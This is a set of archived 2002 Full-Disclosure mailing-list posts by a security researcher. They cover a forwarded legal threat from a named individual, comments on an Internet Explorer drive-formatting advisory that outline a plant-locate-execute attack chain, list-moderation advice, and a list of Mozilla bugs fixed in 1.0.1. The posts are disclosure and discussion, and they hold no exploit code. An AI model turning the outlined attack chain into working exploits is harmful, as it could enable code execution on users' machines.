http://lists.netsys.com/pipermail/full-disclosure/2002-September/001816.html

Apparently, now he wants the above taken down. Did anyone else get recent threats from this nutcase? :)

/Thor

- Original Message -
From: Lel Peto [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Sent: Friday, November 15, 2002 2:43 AM
Subject: reply

Mr. Larholm,

After consulting attorneys here and in Denmark, please know that you are placing yourself and the institution from which you sent your reply messages to me in exposure to a multi million dollar Defamation civil law suit by placing your statement on Google. I have no malice towards you. I am in the process of repaying the funds in full that I owe leading to a potential final resolution. Surely you are not familiar with my case and the oil industry. I simply ask you to please remove your statement about me off the google search mechanism and the web which you have placed. If so, this matter shall be closed.

Thank you,
Lel Peto
Re: [Full-Disclosure] ZDnet forum: IE formatting local drive
It's a copy of the advisory from Sandblad, with a few bits changed.

http://online.securityfocus.com/archive/1/298924/2002-11-02/2002-11-08/1
http://online.securityfocus.com/archive/1/299094/2002-11-02/2002-11-08/1
http://online.securityfocus.com/archive/1/299330/2002-11-09/2002-11-15/1
http://online.securityfocus.com/archive/1/299230/2002-11-09/2002-11-15/1

Why is this even surprising people? For ages, you have been able to plant a file on the user's machine, locate its location, jump to a local security zone and then execute the file. Sure, you skip 2 steps by using the HTMLHelp Control, but the impact is the same - running arbitrary code.

Regards
Thor Larholm, Security Researcher
PivX Solutions, LLC
Are You Secure? http://www.PivX.com

- Original Message -
From: Alan Rouse [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Sent: Monday, November 11, 2002 7:29 PM
Subject: [Full-Disclosure] ZDnet forum: IE formatting local drive

Format a local drive by visiting a URL from a fully patched Windows / IE platform. This appeared last night:

http://forums.zdnet.com/group/zd.Security.Virus.Alerts/community/community.tpt/@thread@33885@F@1@D-,D@ALL/@article@mark@33885?EXP=ALLVWM=ROS=OC=75
Re: [Full-Disclosure] 60 Poot ze-a cheekee in de-a oofee!
As discussed to death in the past couple of weeks, if you don't like the messages, see procmail(1) and procmailrc(5).

From http://lists.netsys.com/full-disclosure-charter.html :

"It is expected that the list will be largely self-policing, however in special circumstances (eg spamming, misappropriation) then offending members may be removed from the list by the management."

The above seems like a much simpler, centralized solution.

Thor Larholm
URL: http://www.jibbering.com/faq/ FAQ for comp.lang.javascript
URL: http://jscript.dk/unpatched/ Unpatched IE vulnerabilities
[Full-Disclosure] Mozilla vulnerabilities, an update
On September 9th I wrote the following to [EMAIL PROTECTED]

-- START --

I noticed that you have published a list ( http://mozilla.org/releases/mozilla1.0.1/security-fixes-1.0.1.html ) of security issues that have been fixed in Mozilla 1.0.1

I would recommend posting this list to the Bugtraq mailing list, [EMAIL PROTECTED], so that the secinfo industry and the public in general become aware of these. This would help raise the awareness of your security efforts, as well as urge users of older versions to upgrade and provide hints to other software products that embed Gecko, or other parts of Mozilla, that they should consider getting fresh sources for their projects.

In case you feel that this is not a necessary action, I would like to personally make the list aware of these security fixes in a matter of 5 working days.

-- END --

At first I received a reply from Asa Dotzler, which among others mentioned that the list was far from comprehensive and "It would be much better if someone (mitch) updated the real page at http://www.mozilla.org/projects/security/known-vulnerabilities.html"; So I forwarded and wrote to Mitch:

"May I recommend updating the official list of known vulnerabilities in Mozilla to include the vulnerabilities that have been fixed, such as XMLHTTP and the many on Asa's list?"

And received a short reply last Thursday:

"Yes, that page will be updated soon. Thanks for letting me know."

Since nothing has happened, I thought I would pass this on to the list. This is a short list of issues fixed between the 1.0 and 1.0.1 version of Mozilla. As Asa mentioned, this list was just put together from some queries on Bugzilla. Undoubtedly, there will be many more vulnerabilities that have been fixed, and it would be a welcome change to let the public know about these.

BUG ID  Product   Component             Summary
88183   Browser   Plug-ins              navigator.plugins leaks path names
104472  Browser   Security              execution of scripts in the file: protocol from XUL using cgi
125583  Browser   Security              Disable automatic XLinks in Mail
135267  Browser   Security              Reading files cross-host using styles
144228  MailNews  Security              Malicious email breaks POP server connection
146094  Browser   Networking            Stealing third-party cookies through a proxy
147754  Browser   Security              XMLSerializer needs same-origin check
148256  Browser   XML                   flawfinder warnings in XML Extras
148269  NSS       Libraries             flawfinder warnings in mozilla/security
148520  Browser   Password Manager      window.prompt is returning a saved password instead of prompting.
149777  Browser   Security              Node cloned from external, untrusted document and appended to chrome document.
149943  Browser   Security              Princeton-like exploit may be possible
150339  Browser   Internationalization  huge font crashes X Windows
151933  Browser   XML                   xml:base should not allow setting chrome URLs
152697  Browser   Networking            no limit on the size of a HTTP header
152725  Browser   Cookies               Possible cookie stealing using javascript: URLs
154030  Browser   Security              HTML directory indexer doesn't html-escape url
154240  PSM       Client Libraries      No warning when redirecting https-http-https at http protocol level
154930  Browser   Security              document.domain abused to access hosts behind firewall
155222  Browser   Security              Heap corruption in PNG library
157202  Browser   Security              Exploitable (?) heap overrun in PNG
157652  Browser   JavaScript Engine     Crash, possible heap corruption in JS Array.prototype.sort
157845  Browser   DOM Events            Crash involving document.open()
157989  Browser   ImageLib              Possible heap corruption with 0-width GIF
161721  Browser   Installer             install in onkeypress for space key bypasses warning dialog

To put it shortly, I do appreciate the efforts put forth by the Mozilla.org team, I just wish they could be more communicative instead of hiding the fact that Mozilla, like most any other software product, has had and will have a long number of security vulnerabilities. Undoubtedly, this gives a different view on the security of Mozilla than one would get by reading the official list of vulnerabilities (listing just 1 vulnerability).

Again, the above was just an incomplete list of security issues that were fixed between the minor version change 1.0 to 1.0.1, I have no idea about the amount of issues that remain or that have been fixed so far.

Regards
Thor Larholm, Security Researcher
PivX Solutions, LLC
Are You Secure? http://www.PivX.com